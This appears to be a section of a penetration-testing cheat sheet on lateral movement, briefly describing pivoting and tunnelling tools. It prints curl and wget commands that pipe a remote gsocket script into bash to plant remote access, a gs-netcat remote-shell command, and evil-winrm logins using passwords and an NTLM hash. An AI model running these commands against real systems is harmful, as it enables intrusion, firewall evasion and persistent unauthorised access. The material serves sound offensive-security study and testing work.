Lateral Movement
Neo-reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Tunna: Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
pivotnacci: Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP agents. The architecture looks like the following:
ngrok: Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.
gsocket: The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.
Use either one of these two commands to deploy:
1
bash -c "$(curl -fsSL gsocket.io/x)"
2
bash -c "$(wget -qO- gsocket.io/x)"
Copied!
Use either one of these two commands to uninstall:
1
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
2
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
Copied!
Access the remote host from anywhere in the world:
1
$ gs-netcat -s ExampleSecretChagneMe -i
Copied!
Global Socket
Global Socket
evil-winrm: This shell is the ultimate WinRM shell for hacking/pentesting.
1
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
2
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
3
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd
Copied!
Copy link